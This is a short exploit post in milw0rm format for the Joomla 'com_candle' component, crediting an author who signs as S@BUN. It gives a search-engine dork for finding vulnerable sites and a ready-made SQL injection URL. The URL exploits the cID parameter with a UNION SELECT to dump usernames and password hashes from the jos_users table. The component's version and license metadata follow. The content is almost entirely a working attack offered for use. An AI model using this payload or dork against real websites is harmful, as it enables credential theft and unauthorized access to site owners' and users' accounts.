############################################# # ########### JOOMLA com_candle SQL Injection(cid) # ############################################# # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 #### ####MAiL : hackturkiye.hackturkiye@gmail.com # ############################################# # ##DORK 1 : allinurl:"com_candle" # ############################################# EXPLOIT : index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/* ############################################# ################# S@BUN #################### ############################################# ######## hackturkiye.hackturkiye@gmail.com ###### ############################################# Candle Son Vu March 2007 (C) 2007 Open Source Matters. All rights reserved. http://www.gnu.org/copyleft/gpl.html GNU/GPL sora4g@gmail.com 1.0.0 Candle Component. # milw0rm.com [2008-03-08]